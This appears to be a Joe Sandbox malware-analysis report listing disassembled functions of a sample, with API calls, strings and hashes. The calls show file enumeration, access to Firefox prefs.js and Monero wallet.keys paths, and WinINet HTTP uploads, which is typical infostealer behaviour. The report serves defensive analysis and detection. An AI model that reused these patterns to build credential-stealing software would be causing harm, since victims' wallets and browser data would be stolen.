Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: f6a364dea2e1b1404bf3908ceabfd45674db1f08ee5a6d5b4e2394110bbb5baf
Instruction ID: 27394cb4b94ab0df42de5d470a69e981453a1c12c8ea64e8f52263ded7200670
Opcode Fuzzy Hash: f6a364dea2e1b1404bf3908ceabfd45674db1f08ee5a6d5b4e2394110bbb5baf
Instruction Fuzzy Hash: 0AB1B6B1B083109FEB08DF28D45661A77F9BB89704F09892EE599D3F90E770D806CB91

Function 00994910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0099492C
FindFirstFileA.KERNEL32(?,?), ref: 00994943
StrCmpCA.SHLWAPI(?,009A0FDC), ref: 00994971
StrCmpCA.SHLWAPI(?,009A0FE0), ref: 00994987
FindNextFileA.KERNEL32(000000FF,?), ref: 00994B7D
FindClose.KERNEL32(000000FF), ref: 00994B92

Strings

%s\%s, xrefs: 009949FB
%s\%s, xrefs: 009949A4
%s\*, xrefs: 00994920

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 56976d68452d5f2ad7a91268a31aaf887932eba73482c2210de38ba5c4de3497
Instruction ID: e0f2755e4e9f240131f49f07a1b895ba2c8f8c6665b664331606aaec691176fc
Opcode Fuzzy Hash: 56976d68452d5f2ad7a91268a31aaf887932eba73482c2210de38ba5c4de3497
Instruction Fuzzy Hash: BD6134B1900218ABCB24EBA4DC49FEA737CBB8C705F044598B54996141EF75EB85CF91

Function 00984880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
Part of subcall function 009847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00984915
StrCmpCA.SHLWAPI(?,0157E538), ref: 0098493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00984ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,009A0DDB,00000000,?,?,00000000,?,",00000000,?,0157E4A8), ref: 00984DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00984E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00984E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00984E49
InternetCloseHandle.WININET(00000000), ref: 00984EAD
InternetCloseHandle.WININET(00000000), ref: 00984EC5
HttpOpenRequestA.WININET(00000000,0157E598,?,0157DCA8,00000000,00000000,00400100,00000000), ref: 00984B15

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

InternetCloseHandle.WININET(00000000), ref: 00984ECF

Strings

------, xrefs: 009849BD
------, xrefs: 00984B28
", xrefs: 00984D33
", xrefs: 00984BF2
------, xrefs: 00984C69

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 389145f3cae01ee1a1b2946bb99b9db8178cbcdeecb946d8a07ffe885e8a242a
Instruction ID: fe056e937175b4793245b3b075c68219982bcc0a30c3867e1149313174948b26
Opcode Fuzzy Hash: 389145f3cae01ee1a1b2946bb99b9db8178cbcdeecb946d8a07ffe885e8a242a
Instruction Fuzzy Hash: 3C12D972920118AADF15EB95DC92FEEB378FF95304F504199B10A62091EF702F49CFA6

Function 00993EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00993EC3
FindFirstFileA.KERNEL32(?,?), ref: 00993EDA
StrCmpCA.SHLWAPI(?,009A0FAC), ref: 00993F08
StrCmpCA.SHLWAPI(?,009A0FB0), ref: 00993F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0099406C
FindClose.KERNEL32(000000FF), ref: 00994081

Strings

%s\%s, xrefs: 00993EB7

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 81aeb159733e43af419ee16f0e70b4784815ca24e519b1d9e1b26fd72d0cba51
Instruction ID: 92e63c98122c575d27378b4c3cf3c27c945f133fed4b7880dadd7af724a40301
Opcode Fuzzy Hash: 81aeb159733e43af419ee16f0e70b4784815ca24e519b1d9e1b26fd72d0cba51
Instruction Fuzzy Hash: 235125B2900218ABCF24EBB4DC85FEA737CBB88304F408598B65997150DF75EB858F91

Function 0098F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009A15B8,009A0D96), ref: 0098F71E
StrCmpCA.SHLWAPI(?,009A15BC), ref: 0098F76F
StrCmpCA.SHLWAPI(?,009A15C0), ref: 0098F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0098FAB1
FindClose.KERNEL32(000000FF), ref: 0098FAC3

Strings

prefs.js, xrefs: 0098F812

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: d65e52bad3cf431f1b9fe92c2fb76dde83b9a2b47a9af88e3785d06f83818be3
Instruction ID: 1a40189f94de1dc24f7a213f3f7caf685b0ad8f02a289f54337cde4ad01b573f
Opcode Fuzzy Hash: d65e52bad3cf431f1b9fe92c2fb76dde83b9a2b47a9af88e3785d06f83818be3
Instruction Fuzzy Hash: CBB10D719101189BDF24FB68DC96FEE7379EFD4300F4085A8A40A96291EF346B49CBD6

Function 009816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009A510C,?,?,?,009A51B4,?,?,00000000,?,00000000), ref: 00981923
StrCmpCA.SHLWAPI(?,009A525C), ref: 00981973
StrCmpCA.SHLWAPI(?,009A5304), ref: 00981989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00981D40
DeleteFileA.KERNEL32(00000000), ref: 00981DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00981E20
FindClose.KERNEL32(000000FF), ref: 00981E32

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Strings

\*.*, xrefs: 009817F1

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 836b40f3d8e42f8a40238e974a684bbc94e7b429a848b009a3aa2cb06a5cec9c
Instruction ID: 4cf265ea1e6522abb7afafa864b816ec50746225234a0583c00e13fba3b74662
Opcode Fuzzy Hash: 836b40f3d8e42f8a40238e974a684bbc94e7b429a848b009a3aa2cb06a5cec9c
Instruction Fuzzy Hash: B412E9719201189BDF19FB65CC96BEE7378EF94300F404199A50AA2191EF306F8ACFE1

Function 0098DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009A14B0,009A0C2A), ref: 0098DAEB
StrCmpCA.SHLWAPI(?,009A14B4), ref: 0098DB33
StrCmpCA.SHLWAPI(?,009A14B8), ref: 0098DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0098DDCC
FindClose.KERNEL32(000000FF), ref: 0098DDDE

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 68e90f49ffb0daf7b27d4364ca502f367fefde02f59682ec0d95c309e74b3265
Instruction ID: a71fce364813246910a7df32d5e9ef1edf5b6b331eae5c6a83b3a985971eecbb
Opcode Fuzzy Hash: 68e90f49ffb0daf7b27d4364ca502f367fefde02f59682ec0d95c309e74b3265
Instruction Fuzzy Hash: 8D9121729101189BCF14FBB4EC96EED737DEBC8304F408658F91A96191EE349B498BD2

Function 00997B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

GetKeyboardLayoutList.USER32(00000000,00000000,009A05AF), ref: 00997BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00997BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00997C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00997C62
LocalFree.KERNEL32(00000000), ref: 00997D22

Strings

/ , xrefs: 00997C7F

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
